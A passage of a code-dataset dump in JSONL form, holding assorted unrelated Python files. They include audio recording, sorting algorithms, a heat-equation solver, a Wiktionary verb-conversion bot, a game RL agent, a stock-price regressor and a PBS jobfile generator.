cluster_coordinates[1].append(int(c_y))\n\nprint(cluster_areas)\nprint(cluster_x)\nprint(cluster_y)\n\nprint(cluster_coordinates)\n","sub_path":"floodF.py","file_name":"floodF.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606113258","text":"#Commented file , to get audio\nimport os\nimport argparse \n\nimport numpy as np\nfrom scipy.io import wavfile \nfrom hmmlearn import hmm\nfrom python_speech_features import mfcc\nfrom joblib import dump,load \n\nimport sounddevice as sd\nimport librosa\nimport queue\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport soundfile as sf\nimport HMM\n\n\n#AUDIO_DEVICE='Microphone (Realtek(R) Audio), MME'\nAUDIO_DEVICE='Microphone (Realtek(R) Audio), Windows DirectSound'\nSAMPLING_RATE = 8000\n#default block size is 2048\n#BLOCK_SIZE=2048 #if is too small it print 0\naudio_queue = queue.Queue()\n#output_audio_folder=\"./CoughSpeechWenRei/cough/\"\n\ndef capture_audio(block, block_len, time, status):\n\n    audio_queue.put(block.copy())\n    #print(block_len)\n\n# Function to parse input arguments\ndef build_arg_parser():\n    #./name/Cough/\n    parser = argparse.ArgumentParser(description='Create Audio Folder')\n    parser.add_argument(\"-d\", \"--audio-dir\", dest=\"output_audio_folder\",required=True,\n            help=\"Audio Foldername\")\n    parser.add_argument(\"-i\",\"--iteration\",dest=\"iteration\",default=15,help=\"Number of Audios\")\n    return parser\n\n\nif __name__=='__main__':\n    args = build_arg_parser().parse_args()\n    output_audio_folder = args.output_audio_folder\n    if output_audio_folder[-1]!='/':\n        output_audio_folder=output_audio_folder+\"/\"\n    if os.path.isdir(output_audio_folder)==False:\n        os.makedirs(output_audio_folder)\n    iteration=args.iteration\n    #hmm_models_load=load('hmmaudio.joblib')\n\n    input_files=[]\n    audio=np.array([])\n    print(\"start\")\n    for a in range(int(iteration)):\n        #printing to buffer will cause signal distortion, so don't print \n        #filename=input(\"Filename?\")\n        filename=output_audio_folder+str(a)+\".wav\"\n        if os.path.isfile(filename)==True:\n            os.remove(filename)\n        with sf.SoundFile(filename, mode='x', samplerate=SAMPLING_RATE,\n                      channels=1) as file:\n            count=0\n            #print(\"Start\") \n            #channel must be 2 to comply with wav file \n            with sd.InputStream(device=AUDIO_DEVICE, channels=1, callback=capture_audio,\n                            samplerate=SAMPLING_RATE):\n                \n\n                while count<20:#20 1.15second #200 is 5 seconds \n                    a=audio_queue.get()\n                    if len(audio) == 0:\n                        audio = a\n                    else:\n                        audio = np.append(audio, a, axis=None) \n                    #print('Queue Audio',a.shape) \n                    file.write(a)\n                    #print(audio_queue.get())\n                    count+=1\n                    #print(count)\n            file.close()\n\n\n","sub_path":"1_getaudio.py","file_name":"1_getaudio.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321022985","text":"from . 
import phase2Condition\nfrom ..sudoku.grid.house import HouseType\nfrom ..sudoku.grid.coordinate import Coordinate\nfrom .hiddenSingle import HiddenSingle\nfrom ..misc import utils\n\n\nclass Phase2Trial:\n\n    def __init__(self,\n                 condition: phase2Condition,\n                 tutorial_goal,\n                 tutorial_house_type,\n                 digit_set1: set,\n                 digit_set2: set):\n        self.condition = condition\n        digit_set = digit_set2 if self.condition.digit_set else digit_set1\n        self.hidden_single = self.create_hidden_single(tutorial_goal, tutorial_house_type, digit_set)\n\n    def create_hidden_single(self, tutorial_goal, tutorial_house_type, digit_set):\n        house_type = HouseType.Column if tutorial_house_type == HouseType.Row else HouseType.Row\n        house_type = house_type if self.condition.house_type else tutorial_house_type\n\n        if house_type == HouseType.Row:\n            if self.condition.house_index:\n                x = utils.sample(set(range(9)) - {tutorial_goal.x}, 1)\n            else:\n                x = tutorial_goal.x\n\n            if self.condition.cell_index:\n                y = utils.sample(set(range(9)) - {tutorial_goal.y}, 1)\n            else:\n                y = tutorial_goal.y\n        else:\n            if self.condition.house_index:\n                y = utils.sample(set(range(9)) - {tutorial_goal.y}, 1)\n            else:\n                y = tutorial_goal.y\n\n            if self.condition.cell_index:\n                x = utils.sample(set(range(9)) - {tutorial_goal.x}, 1)\n            else:\n                x = tutorial_goal.x\n\n        goal = Coordinate(x, y)\n        return HiddenSingle(goal, house_type, digit_set)\n\n    def package(self):\n        return {'condition': utils.as_dict(self.condition),\n                'hidden_single': self.hidden_single.package()}","sub_path":"python/hiddensingles/experiment/phase2Trial.py","file_name":"phase2Trial.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388683734","text":"def swap(A,p,q):\r\n    tmp = A[p]\r\n    A[p] = A[q]\r\n    A[q] = tmp\r\nK = [50,20,70,10]\r\n##swap(K,1,3)\r\n##print(K)\r\n\r\ndef cariPosisiYangTerkecil(A, dariSini, sampaiSini):\r\n    posisiYangTerkecil = dariSini #-> assume this one is the smallest\r\n    for i in range(dariSini+1, sampaiSini): #-> search the rest of the list\r\n        if A[i] < A[posisiYangTerkecil]: #-> if a smaller one is found\r\n            posisiYangTerkecil = i #-> update the assumed smallest\r\n    return posisiYangTerkecil\r\nA = [18,13,44,25,66,107,78,89]\r\n##j = cariposisiterkecil(A,2,len(A))\r\n##print(j)\r\n\r\ndef kecil(a):\r\n    ter = 0\r\n    for i in range(ter,len(a)):\r\n        if a[i] < a[ter]:\r\n            ter = i\r\n    return ter\r\n##f = kecil(A)\r\n##print(f)\r\n\r\ndef bubbleSort(A):\r\n    n = len(A)\r\n    for i in range(n-1): #->Do the bubbling pass n-1 times\r\n        for j in range(n-i-1): #->Push the largest element to the right end\r\n            if A[j] > A[j+1]: #->If the left one is larger than its right neighbour,\r\n                swap(A,j,j+1) #>swap element j with element j+1\r\n##bubblesort(A)\r\n##print(A)\r\n \r\ndef selectSort(A):\r\n    n = len(A)\r\n    for i in range(n-1):\r\n        indexKecil = cariPosisiYangTerkecil(A, i, n)\r\n        if indexKecil != i:\r\n            swap(A, i, indexKecil)\r\n##selectionsort(K)\r\n##print(K)\r\n \r\ndef insertionSort(A):\r\n    n = len(A)\r\n    for i in range(1,n):\r\n        nilai = A[i]\r\n        pos = i\r\n        while pos > 0 and nilai < A[pos-1]: #->Find the right position\r\n            A[pos] = A[pos-1] # and keep shifting the larger\r\n            pos = pos-1 # values to the right\r\n        A[pos] = nilai #->Place the value of element 
i.\r\nP=[10,51,2,18,4,31,13,5,23,64,29]\r\n##insertionsort(P)\r\n##print(P)\r\n","sub_path":"LatihanModulke5.py","file_name":"LatihanModulke5.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"528842864","text":"# Copyright (c) 2017 Sony Corporation. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#\n# *WARNING*\n# THIS FILE IS AUTO-GENERATED BY CODE GENERATOR.\n# PLEASE DO NOT EDIT THIS FILE BY HAND!\n# If you want to modify this file, edit following files.\n# - build-tools/code_generator/templates/python_src_nnabla_function_bases_py_template.py\n# - build-tools/code_generator/generator/generate_python_src_nnabla_function_bases_py.py\n\nfrom __future__ import absolute_import\n\nfrom .context import get_current_context\nfrom . import function as F\nfrom .auto_forward import get_auto_forward\n\nimport inspect\n\n\n# Templates for function_api source building.\nFUNCTION_API_HEADER = \"def {{name}}{{signature}}:\"\nFUNCTION_API_BODY = '''ctx = get_current_context()\nreturn _func_(ctx, {{shortsignature}})'''\n\n\ndef function_api(func):\n \"\"\"\n Decorator for making function called with current context.\n Some tricky things are done here so that signature and docstring are available.\n \"\"\"\n name = func.__name__\n doc = func.__doc__\n if doc is None:\n doc = \"No docstring.\"\n\n # Parsing argspecs\n spec = inspect.getargspec(func)\n defaults = spec.defaults\n if spec.defaults is None:\n defaults = None\n elif len(spec.defaults) == len(spec.args):\n defaults = defaults[1:]\n # Creating signature\n # e.g. (x, weights, biases=None, n_outputs=None)\n signature = inspect.formatargspec(\n spec.args[1:], spec.varargs, spec.keywords, defaults)\n # Creating signature without parans and defaults\n # e.g. x, weights, biases, n_outputs\n shortsignature = inspect.formatargspec(\n spec.args[1:], spec.varargs, spec.keywords, None)[1:-1]\n\n # Create code by string\n src = (FUNCTION_API_HEADER + '\\n' + '\\n'.join(map(lambda x: ' ' +\n x, FUNCTION_API_BODY.splitlines()))).format(**locals())\n\n # Evaluate source code from string\n code = compile(src, \"<{{name}}>\".format(**locals()), 'single')\n execdict = dict(_func_=func, get_current_context=get_current_context)\n exec(code, execdict)\n\n # Get created function.\n newfunc = execdict[name]\n # DOC newfunc.__doc__ = FUNCTION_API_DOC.format(**locals())\n doc += '''\n\n Note:\n All nnabla functions in :obj:`nnabla.functions` are decorated with the :obj:`nnabla.function_bases.function_api` decorator,\n which queries the current context and passes it into the first argument of the\n original function. 
The original function always takes a context as the first argument.\n\n '''\n newfunc.__doc__ = doc\n newfunc.__source__ = src\n newfunc.__function_api_base__ = func\n newfunc.__module__ = __name__\n return newfunc\n\n\n{function_apis}\n","sub_path":"build-tools/code_generator/templates/python_src_nnabla_function_bases_py_template.py","file_name":"python_src_nnabla_function_bases_py_template.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499360968","text":" \r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nstart=time.time();\r\n\r\nL1=1;\r\nL2=1;\r\nT1=100;\r\nT2=200;\r\nT3=300;\r\nT4=400;\r\n\r\ndx=dy=0.1;\r\ndt=0.00001;\r\n\r\nalpha=0.5;\r\n\r\ndt_stream = 0.002\r\nepsilon_stream = 1.0e-2\r\nrx=alpha*(dt)/dx**2;\r\nry=alpha*(dt)/dy**2;\r\n\r\nN=int(L1/dx)+1;\r\nM=int(L2/dy)+1;\r\n\r\nT_n=np.zeros([N,M]);\r\nT_n1=np.zeros([N,M]);\r\nT_n2=np.zeros([N,M]);\r\n\r\n# Boundary Condition's\r\n\r\nfor j in range (0,M):\r\n i=0;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T1;\r\nfor j in range (0,M):\r\n i=N-1;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T3;\r\nfor i in range (0,N-1):\r\n j=0;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T2;\r\nfor i in range (0,N-1):\r\n j=M-1;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T4;\r\n\r\n \r\n#Time stepping\r\ner=[];\r\nfor t in range (1000):\r\n for k in range (100):\r\n \r\n #step 1\r\n for i in range (1,N-1):\r\n for j in range (1,M-1):\r\n T_n1[i][j]=(rx*T_n1[i-1][j]+(1-ry-rx)*T_n[i][j]+rx*T_n[i+1][j]/\r\n +ry*T_n1[i][j-1]+ry*T_n[i][j+1])/(1+rx+ry);\r\n #Step 2\r\n for i in range (N-2,0,-1):\r\n for j in range (M-2,0,-1):\r\n T_n2[i][j]=(rx*T_n1[i-1][j]+(1-ry-rx)*T_n1[i][j]+rx*T_n2[i+1][j]/\r\n +ry*T_n1[i][j-1]+ry*T_n2[i][j+1])/(1+rx+ry); \r\n error = 0.0;\r\n for i in range(0,N):\r\n for j in range(0,M):\r\n error = error + (T_n1[i][j] - T_n[i][j])**2\r\n er.append(error);\r\n T_n[i][j] = T_n2[i][j]\r\n error = np.sqrt(error/(M*N))\r\n print(\"timestep\", t, \"error=\", error/epsilon_stream, \"iteration number\", k)\r\n er.append(error/epsilon_stream);\r\n if (error/dt_stream)\", \"|\", value)\n existing_args = find_old_template_props(template, pagemsg, verbose)\n if existing_args is None:\n return None\n difvals = []\n for prop in all_verb_props:\n curval = existing_args.get(prop, \"\").strip()\n newval = args.get(\"forms.\" + prop, \"\").strip()\n if curval == newval:\n continue\n elif \",\" in curval and \",\" in newval:\n curvalset = set(re.split(\",\", curval))\n newvalset = set(re.split(\",\", newval))\n if curvalset == newvalset:\n continue\n difvals.append((prop, (curval, newval)))\n return difvals\n\ndef process_page(page, index, parsed):\n global args\n verbose = args.verbose\n pagetitle = str(page.title())\n subpagetitle = re.sub(\"^.*:\", \"\", pagetitle)\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, verbose)\n\n pagemsg(\"Processing\")\n\n if \":\" in pagetitle:\n pagemsg(\"WARNING: Colon in page title, skipping\")\n return\n\n text = str(page.text)\n\n notes = []\n parsed = blib.parse_text(text)\n for t in parsed.filter_templates():\n name = str(t.name)\n if name in templates_to_change or name in refl_templates_to_change:\n refl = name in refl_templates_to_change\n difvals = compare_conjugation(index, page, t, refl, pagemsg, expand_text, verbose)\n if difvals is None:\n pass\n elif difvals:\n difprops = []\n for 
prop, (oldval, newval) in difvals:\n difprops.append(\"%s=%s vs. %s\" % (prop, oldval or \"(missing)\", newval or \"(missing)\"))\n pagemsg(\"WARNING: Different conjugation when changing template %s to {{fr-conj-auto}}: %s\" %\n (str(t), \"; \".join(difprops)))\n else:\n aux = \"\"\n for param in t.params:\n pname = str(param.name)\n pval = str(param.value)\n if not pval.strip():\n continue\n if (pname not in [\"1\", \"2\", \"3\", \"aux\", \"sort\", \"cat\"] or\n pname == \"3\" and pval not in [\"avoir\", \"être\", \"avoir or être\"]):\n pagemsg(\"WARNING: Found extra param %s=%s in %s\" %\n (pname, pval, str(t)))\n if pname == \"aux\" and pval != \"avoir\":\n aux = pval\n pagemsg(\"Found non-avoir auxiliary aux=%s in %s\" % (\n pval, str(t)))\n auxpname = (\"3\" if name in [\"fr-conj-e-er\", \"fr-conj-ir (s)\"] else\n \"aux\" if name in [\"fr-conj-xx-er\", \"fr-conj-é-er\"] else \"2\")\n if pname == auxpname and pval != \"avoir\":\n aux = pval\n pagemsg(\"Found non-avoir auxiliary %s=%s in %s\" % (\n pname, pval, str(t)))\n oldt = str(t)\n del t.params[:]\n t.name = \"fr-conj-auto\"\n if refl:\n t.add(\"refl\", \"yes\")\n if aux:\n t.add(\"aux\", aux)\n newt = str(t)\n pagemsg(\"Replacing %s with %s\" % (oldt, newt))\n notes.append(\"replaced {{%s}} with %s\" % (name, newt))\n\n return str(parsed), notes\n\nparser = blib.create_argparser(\"Convert old fr-conj-* to fr-conj-auto\",\n include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page, edit=True,\n default_cats=[\"French verbs\"])\n","sub_path":"fix_fr_verb.py","file_name":"fix_fr_verb.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350080488","text":"from testkit.cluster import Cluster\n\n\ndef test_pindex_distribution():\n\n # the test itself doesn't have to do anything beyond calling cluster.reset() with the\n # right configuration, since the validation of the cbgt pindex distribution is in the\n # cluster.reset() method itself.\n cluster = Cluster()\n mode = cluster.reset(config_path=\"resources/sync_gateway_configs/performance/sync_gateway_default_performance.json\")\n\n # Verify all sync_gateways are running\n errors = cluster.verify_alive(mode)\n assert(len(errors) == 0)\n\n\n\n\n","sub_path":"testsuites/syncgateway/functional/test_cbgt_pindex.py","file_name":"test_cbgt_pindex.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179506826","text":"from enum import Enum\n\nimport numpy as np\nimport math\nimport lib.config as C\nimport lib.utils as U\nimport time\n\nfrom strategy.agent import Agent as A\nfrom unit.units import Army\n\nimport unit.protoss_unit as P\n\n\nclass ProtossAction(Enum):\n Do_nothing = 0\n Build_worker = 1\n Build_zealot = 2\n Build_pylon = 3\n Build_gateway = 4\n Attack = 5\n Move = 6\n Defend = 7\n Build_sub_base = 8\n Build_cannon = 9\n All = 10\n\n\nclass Protoss(A):\n\n def __init__(self, agent_id=0, global_buffer=None, net=None, restore_model=False):\n A.__init__(self, agent_id=agent_id, global_buffer=global_buffer,\n net=net, restore_model=restore_model)\n self.gateway_num = 0\n self.pylon_num = 0\n self.zealot_num = 0\n self.collected_mineral = 0\n self.MAX_ACTIONS = ProtossAction.All.value\n\n def __str__(self):\n return str(self.time_seconds) + ', ' + str(self.mineral) + \\\n ', ' + 
str(self.mineral_worker_nums) + ', ' + str(self.zealot_num) + ', ' + str(self.food_cap)\n\n def reset(self):\n super().reset()\n self.gateway_num = 0\n self.pylon_num = 0\n self.zealot_num = 0\n self.collected_mineral = 0\n\n def obs(self):\n simple_input = np.zeros([11])\n simple_input[0] = 0 # self.time_seconds\n simple_input[1] = self.mineral_worker_nums\n simple_input[2] = self.gas_worker_nums\n simple_input[3] = self.mineral\n simple_input[4] = self.gas\n simple_input[5] = self.food_cap\n simple_input[6] = self.food_used\n simple_input[7] = self.army_nums\n simple_input[8] = self.gateway_num\n simple_input[9] = self.pylon_num\n simple_input[10] = self.zealot_num\n return simple_input\n\n def set_obs(self, state):\n self.mineral_worker_nums = state[1]\n self.gas_worker_nums = state[2]\n self.mineral = state[3]\n self.gas = state[4]\n self.food_cap = state[5]\n self.food_used = state[6]\n self.army_nums = state[7]\n self.gateway_num = state[8]\n self.pylon_num = state[9]\n self.zealot_num = state[10]\n\n def get_next_state(self, action):\n self.env.step(self.player_id, action)\n return self.obs()\n\n @property\n def result(self):\n return self._result\n\n def play_with_mpc(self, verbose=False):\n max_steps = 100\n state_now = self.obs()\n if verbose:\n print('initial state:', state_now)\n print('initial env:', self.env)\n state_last, action_last = None, None\n for i in range(max_steps):\n if self.is_end or i == max_steps - 1:\n if verbose:\n print(self.local_buffer.rewards)\n if self.env.win_index == self.player_id:\n pass\n self._result = sum(self.local_buffer.rewards)\n # self.global_buffer.add(self.local_buffer)\n break\n\n if state_last is not None:\n reward = self.get_mineral_reward(state_last, state_now)\n if True:\n print('reward:', reward)\n self.local_buffer.append(state_last, action_last, state_now, reward, 0, 0)\n\n action, v_preds = self.mpc.get_action(state_now, agent_clone=self, verbose=verbose)\n state_last = state_now\n state_now = self.get_next_state(action)\n if verbose:\n print('state now:', state_now.astype(dtype=np.int32))\n time.sleep(1)\n action_last = action\n\n def play_with_rl(self, verbose=False):\n max_steps = 125\n state_now = self.obs()\n if verbose:\n print('initial state:', state_now)\n print('initial env:', self.env)\n\n state_last, action_last = None, None\n for i in range(max_steps):\n if self.is_end or i == max_steps - 1:\n if self.env.win_index == self.player_id:\n ratio = (i + 1) / float(max_steps)\n the_reward = 1. 
- ratio / 1.5\n self.local_buffer.rewards[-1] += the_reward\n self._result = the_reward\n\n if verbose:\n print(self.local_buffer.rewards)\n\n #self._result = sum(self.local_buffer.rewards)\n self.global_buffer.add(self.local_buffer)\n break\n\n if state_last is not None:\n reward = 0 # = self.get_pop_reward(state_last, state_now)\n if 0:\n print('reward:', reward)\n v_preds_next = self.net.policy.get_values(state_now)\n v_preds_next = self.get_values(v_preds_next)\n self.local_buffer.append(state_last, action_last, state_now, reward, v_preds, v_preds_next)\n\n action, v_preds = self.net.policy.get_action(state_now, verbose=False)\n state_last = state_now\n state_now = self.get_next_state(action)\n if verbose:\n print('state now:', state_now.astype(dtype=np.int32))\n print('action:', action)\n time.sleep(1)\n action_last = action\n\n def get_pop_reward(self, state_last, state_now):\n pop_reward = state_now[6] - state_last[6]\n return pop_reward\n\n def get_mineral_reward(self, state_last, state_now):\n mineral_reward = state_now[3] - state_last[3]\n return mineral_reward\n\n def get_values(self, values):\n # check if the game is end\n if self.is_end and self.result != 0:\n return 0\n else:\n return values\n\n def get_action_by_policy(self, obs):\n act, v_preds = self.net.policy.get_action(obs, verbose=True)\n return act, v_preds\n\n '''def get_policy_action(self, obs):\n random = np.random.randint(self.MAX_ACTIONS)\n action = random\n return action'''\n\n def fullfill_technology(self, unit):\n if type(unit) == P.Zealot:\n if self.gateway_num > 0:\n return True\n\n return False\n\n def fullfill_creature_condition(self, unit):\n if self.mineral >= unit.mineral_price and self.gas >= unit.gas_price:\n if self.food_cap >= self.food_used + unit.food_used and self.fullfill_technology(unit):\n return True\n else:\n return False\n\n def win(self):\n if self.zealot_num >= 8:\n return True\n else:\n return False\n\n def get_build_num(self, unit):\n max_n = self.gateway_num\n n = 1\n #print('max_n:', max_n)\n for i in range(max_n):\n if unit.mineral_price * i < self.mineral and unit.food_used * i + self.food_used < self.food_cap:\n continue\n else:\n n = i - 1\n break\n #print('n:', n)\n return n\n\n def step(self, action):\n if action == ProtossAction.Build_worker.value:\n if self.mineral >= 50 and self.food_used < self.food_cap:\n self.mineral_worker_nums += 1\n self.food_used += 1\n self.mineral -= 50\n elif action == ProtossAction.Build_zealot.value:\n Zealot = P.Zealot()\n if self.fullfill_creature_condition(Zealot):\n n = self.get_build_num(Zealot)\n self.army_nums += n\n self.zealot_num += n\n self.food_used += Zealot.food_used * n\n self.mineral -= Zealot.mineral_price * n\n self.add_unit(Zealot, n)\n elif action == ProtossAction.Build_pylon.value:\n if self.mineral >= 100:\n self.building_nums += 1\n self.food_cap += 8\n self.pylon_num += 1\n self.mineral -= 100\n elif action == ProtossAction.Build_gateway.value:\n if self.mineral >= 150 and self.pylon_num >= 1:\n self.gateway_num += 1\n self.building_nums += 1\n self.mineral -= 150\n elif action == ProtossAction.Attack.value:\n if self.military_num() > 0:\n #print('order:', self.env.army[self.player_id].order)\n self.env.army[self.player_id].order = Army.Order.ATTACK\n #print('order:', self.env.army[self.player_id].order)\n\n elif action == ProtossAction.Defend.value:\n if self.military_num() > 0:\n self.env.army[self.player_id].order = Army.Order.DEFEND\n elif action == ProtossAction.Build_sub_base.value:\n pass\n elif action == 
ProtossAction.Build_cannon.value:\n            pass\n\n        # update mineral\n        self.collected_mineral += min(self.mineral_worker_nums, 16) * 3\n        if self.collected_mineral <= 10000:\n            self.mineral += min(self.mineral_worker_nums, 16) * 3\n\n        self.time_seconds += 5\n\n        # update population\n        if self.military_num() == 0:\n            #print('order:', self.env.army[self.player_id].order)\n            self.env.army[self.player_id].order = Army.Order.NOTHING\n            #print('order:', self.env.army[self.player_id].order)\n        else:\n            self.army_nums = self.military_num()\n            self.zealot_num = self.military_num()\n        self.food_used = self.military_num() * 2 + self.mineral_worker_nums + self.gas_worker_nums\n","sub_path":"TG-zerg and TG-Terran/Terran/strategy/protoss_agent.py","file_name":"protoss_agent.py","file_ext":"py","file_size_in_byte":9413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92867609","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 30 21:03:33 2017\r\n\r\n@author: vishalkr71\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn import svm\r\n\r\n#Reading of Data \r\ndef readdata(): \r\n    start_date=\"2016-01-01\"\r\n    end_date=\"2016-01-20\"\r\n    symbols=['HERO']\r\n    dates=pd.date_range(start_date,end_date)\r\n    df1=pd.DataFrame(index=dates)\r\n    for symbol in symbols:\r\n        df1=pd.read_csv(\"{}.csv\".format(symbol),index_col=\"Date\",parse_dates=True,\r\n                usecols=['Date','Open','Close','Adj Close',],na_values=['nan'])\r\n    df1=df1.sort_index()\r\n    print(df1)\r\n    return df1\r\n\r\n#Division of stock in training and testing data\r\ndef division(dataset):\r\n    opening=dataset.ix[:,1]\r\n    closing=dataset.ix[:,2]\r\n    openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest =\\\r\n        train_test_split(opening, closing, test_size=0.25, random_state=42)\r\n    openingPriceTrain = np.reshape(openingPriceTrain, (openingPriceTrain.size, 1))\r\n    closingPriceTrain = np.reshape(closingPriceTrain, (closingPriceTrain.size, 1))\r\n    openingPriceTest = np.reshape(openingPriceTest, (openingPriceTest.size, 1))\r\n    closingPriceTest = np.reshape(closingPriceTest, (closingPriceTest.size, 1))\r\n\r\n    sampledData = {\"openingPriceTrain\":openingPriceTrain, \"closingPriceTrain\":closingPriceTrain,\r\n                   \"openingPriceTest\":openingPriceTest, \"closingPriceTest\":closingPriceTest}\r\n    return sampledData\r\n\r\n#Random Forest Regression \r\ndef predictRandomForestReg(data, priceToPredict):\r\n    openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest = \\\r\n    data[\"openingPriceTrain\"], data[\"openingPriceTest\"], data[\"closingPriceTrain\"], data[\"closingPriceTest\"]\r\n    clf = RandomForestRegressor(n_estimators=10)\r\n    clf = clf.fit(openingPriceTrain, closingPriceTrain)\r\n    print(clf.predict(priceToPredict))\r\n    score=clf.score(openingPriceTest, closingPriceTest)\r\n    print(\"Accuracy:\")\r\n    print(score)\r\n    calculated=clf.predict(openingPriceTest)\r\n    fig, ax = plt.subplots()\r\n    ax.scatter(openingPriceTrain, closingPriceTrain)\r\n    ax.set_ylabel('Predicted SVM')\r\n    ax.scatter(closingPriceTest,calculated )\r\n    ax.set_xlabel('Measured')\r\n    ax.set_ylabel('Predicted')\r\n    plt.show()\r\n    \r\n#Support Vector Regression \r\ndef predict(data, priceToPredict):\r\n    openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest = \\\r\n    data[\"openingPriceTrain\"], data[\"openingPriceTest\"], 
data[\"closingPriceTrain\"], data[\"closingPriceTest\"]\r\n    openingPriceTrain = openingPriceTrain.reshape(-1,1)\r\n    closingPriceTrain = closingPriceTrain.reshape(-1,1)\r\n    clf = svm.LinearSVR()\r\n    clf.fit(openingPriceTrain, closingPriceTrain)\r\n    print(clf.predict(priceToPredict))\r\n    score = clf.score(openingPriceTest, closingPriceTest)\r\n    print(\"Accuracy:\")\r\n    print(score)\r\n    \r\n#Main Function\r\nif __name__ == \"__main__\":\r\n    dataset = readdata()\r\n    sampledData= division(dataset)\r\n    priceToPredict=3000\r\n    print(\"Random Forest Regressor Prediction:\")\r\n    predictRandomForestReg(sampledData, priceToPredict)\r\n    print(\"SVM Prediction:\")\r\n    predict(sampledData, priceToPredict)","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"341814597","text":"#!/usr/bin/python3\nfrom os import path\nfrom platform import machine\nfrom sys import argv\n\ndef get_dropbox_version(directory):\n    \"\"\"\n    Corrects the hardcoded dropbox directory\n    Args:\n        directory(str): the default dropbox directory\n    \"\"\"\n    version_file = directory.split(\"{dropbox_version}\")[0].split(\"/\")\n    del version_file[len(version_file) - 1]\n    version_file = \"/\".join(version_file) + \"/VERSION\"\n    if path.exists(version_file):\n        with open(version_file) as f:\n            return f.read()\n    return \"\"\n\ndropbox_path = argv[1]\ndropbox_path = dropbox_path.replace(\"{arch}\", machine())\ndropbox_path = dropbox_path .replace(\n    \"{dropbox_version}\", get_dropbox_version(dropbox_path))\nprint(dropbox_path)\n","sub_path":"database/scripts/dropbox.py","file_name":"dropbox.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547139436","text":"#genJobfile.py\n\"\"\"\nmore-or-less automated generation of PBS jobfile\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser(prog=\"genJobfile.py\",\n                                description=\"PBS Jobfile generation script.\")\n\nparser.add_argument('jobfileName',type=str)\nparser.add_argument('jobName',type=str)\nparser.add_argument('nnodes',type=int)\nparser.add_argument('ppn',type=int)\nparser.add_argument('mpi_procs_per_node',type=int)\nparser.add_argument('ompthreads_per_node',type=int)\nparser.add_argument('runtimeNumHours',type=int)\nparser.add_argument('queue',type=str)\nparser.add_argument('latticeType',type=str)\nparser.add_argument('partitionType',type=str)\n\n\n# parse input arguments\nargs = parser.parse_args()\n\n# assign to the variables\n\njobfileName = args.jobfileName\njobName = args.jobName\nnnodes = args.nnodes\nppn = args.ppn\nmpi_procs_per_node = args.mpi_procs_per_node\nompthreads_per_node=args.ompthreads_per_node\nruntimeNumHours = args.runtimeNumHours\nqueue = args.queue\nlatticeType = args.latticeType\npartitionType = args.partitionType\n\n# make these additional arguments?\ngeom_file = 'channel_cavity_geom.py'\nrun_script = 'run_chanCav_grace.sh'\nN_divs=21\npp_bool=1\ndynamics=3\n\n\nfilesToCopy = ['FluidChannel.py', 'pyLattice.py', 'pyNFC.py', 'pyNFC_run.py',\n               'pyNFC_Util.py', 'validate.py', 'vtkHelper.py', run_script,\n               'pyPartition.py','pyNFC_preprocess.py','pyNFC_partition.py',\n               'partition_suggestion.py','partition_compare.py',\n               'LBM_Interface.so','PartitionHelper.so','processNFC.py','hdf5Helper.py',geom_file]\n\n\n\nif runtimeNumHours < 10:\n    walltime = \"0%d:00:00\"%runtimeNumHours\nelse:\n    walltime = \"%d:00:00\"%runtimeNumHours # may be a problem if runtime > 99 hours\r\n    
